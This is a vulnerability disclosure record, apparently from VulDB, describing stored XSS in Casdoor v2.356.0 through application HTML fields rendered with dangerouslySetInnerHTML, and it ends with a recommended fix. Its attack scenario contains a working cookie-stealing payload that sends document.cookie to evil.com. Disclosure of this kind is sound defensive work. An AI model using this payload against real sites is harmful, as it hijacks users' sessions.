| タイトル | Casdoor v2.356.0 Cross Site Scripting |
|---|
| 説明 | Stored XSS via Application formCss / formSideHtml
**Evidence:**
```javascript
{inIframe() || isMobile() ? null : <div dangerouslySetInnerHTML={{__html: application.formCss}} />}
{inIframe() || !isMobile() ? null : <div dangerouslySetInnerHTML={{__html: application.formCssMobile}} />}
<div dangerouslySetInnerHTML={{__html: application.formSideHtml}} />
```
The `formCss`, `formCssMobile`, and `formSideHtml` fields from the application object are rendered as raw HTML using `dangerouslySetInnerHTML`. If an organization admin (or anyone who can modify application settings) injects malicious JavaScript into these fields, it executes for every user who visits the login page.
**Attack scenario:** An org admin sets `formSideHtml` to `<img src=x onerror="fetch('https://evil.com/steal?t='+document.cookie)">`. Every user visiting the login page has their session cookies exfiltrated.
**Fix:** Sanitize these fields with a library like DOMPurify before rendering, or restrict them to a CSS-only subset by parsing and validating the content server-side.
--- |
|---|
| ユーザー | Ghufran Khan (UID 95493) |
|---|
| 送信 | 2026年03月17日 14:25 (18 日 ago) |
|---|
| モデレーション | 2026年04月03日 09:26 (17 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 355072 [Casdoor 2.356.0 dangerouslySetInnerHTML formCss/formCssMobile/formSideHtml クロスサイトスクリプティング] |
|---|
| ポイント | 17 |
|---|